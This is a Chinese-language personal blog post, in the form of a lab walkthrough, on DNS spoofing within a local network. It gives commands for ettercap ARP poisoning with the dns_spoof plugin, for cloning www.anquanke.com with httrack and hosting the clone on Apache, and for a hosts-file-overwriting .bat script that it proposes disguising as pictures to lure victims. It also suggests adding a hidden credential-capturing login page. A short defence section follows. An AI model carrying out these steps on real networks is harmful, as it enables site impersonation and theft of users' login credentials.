theKingOfNight's Blog

DNS欺骗

字数统计: 838阅读时长: 3 min
2019/01/19 Share

DNS服务器记录域名所对应的ip,全球总共有13个根域名服务器。
以访问www.anquanke.com为例

理论基础

1
2
3
4
5
在浏览器的搜索栏输入www.anquanke.com
1.先查询本地host文件,检测www.anquanke.com有没有对应ip,如果有,直接访问ip,否则进行后续步骤
2.浏览器然后向DNS服务器(网关或者真正的DNS服务器)发送一个包
3.DNS服务器返回对应的ip地址
3.浏览器去访问对应ip

环境

1
2
3
默认网关:192.168.230.2
攻击者ip:192.168.230.128
示例局域网中主机ip:192.168.230.133

同一局域网dns欺骗

未开始攻击,目标主机

image.png

开始攻击

攻击方设置

1
2
3
修改etter.dns文件
vi /etc/ettercap/etter.dns
域名 A 对应的ip地址

1
2
3
tips
如果域名设置为*,则将所有的解析被解析为对应ip
容易暴露身份。

image.png

1
2
3
克隆网站
kali中的httrack一顿回车操作,而且比windows的工具好用多了。
直接命令行输入httrack

无奈安全客的网站克隆的一部分,整个网站太大了,这里仅以举例说明…
image.png

image.png

image.png

image.png

啧啧啧。

1
2
在网站目录下将文件拷贝
root@kali:~/websites/anquanke# cp -r * /var/www/html

1
2
启动Apache服务
/etc/init.d/apache2 start
1
2
3
4
5
6
7
8
启动ettercap
ettercap -G
具体步骤这里不说了,中间人攻击里面有的。
Sniff->unified *->eth0->OK
Hosts->scan*主机扫描
Host List->网关(只需要选定网关就好了)
192.168.230.2 Add to Target 2
Mitm->ARP pos*
1
2
3
上述都做完以后
Plugin->Manege the plugins
双击dns_spoof

image.png

1
start->start sniffing

同一局域网内的其他主机
访问www.anquanke.com网站,可以看到如下:
image.png
然后显示不全的原因是安全客整个网站太大了,很多规则都没有克隆,另外一方面浏览器版本太低。
点击其中的一个文章,比如点击这篇文章
image.png

image.png

image.png

image.png
可以看到,如果给与足够的时间克隆整个网站,受骗者将会很难以区分是否是真实网站。

dns欺骗的扩展利用

欺骗用户修改host

1
2
3
4
修改host的文件代码.bat,可以批量添加域名,这里也可以用其他的方式,比如exe文件等,美女图片等等吸引目标点击,本菜这里为了方便,就使用bat了。
set ip=192.168.230.128(攻击者ip/公网可以访问的ip)
set hosts="c:\WINDOWS\system32\drivers\etc\hosts"
echo %ip% www.anquanke.com>%hosts%

在目标主机运行了添加host的bat后,剩余操作和上述类似,即可完成DNS扩展利用。

1
2
3
4
5
tips
可以在登录等重要的地方背后添加跳转到正确界面
截取登录用户的用户名和密码
这个懂一些编程语言的同鞋应该很容易做到
本菜这里就不演示了。

1
2
3
tips
本菜这里对目录中的路径没有做修改,所以url会出现两个www.anquanke.com
这里也是新手容易忽视的地方,不过可以简单的修改文件路径。

DNS欺骗的防治

1.在C盘根目录的autoexec.bat中输入绑定IP和MAC到网关的命令可以实现开机自动绑定
2.在路由中绑定MAC和IP
3.安装ARP防火墙或者网络防火墙

CATALOG
  1. 1. 理论基础
  2. 2. 环境
  3. 3. 同一局域网dns欺骗
  4. 4. 开始攻击
  5. 5. dns欺骗的扩展利用
  6. 6. DNS欺骗的防治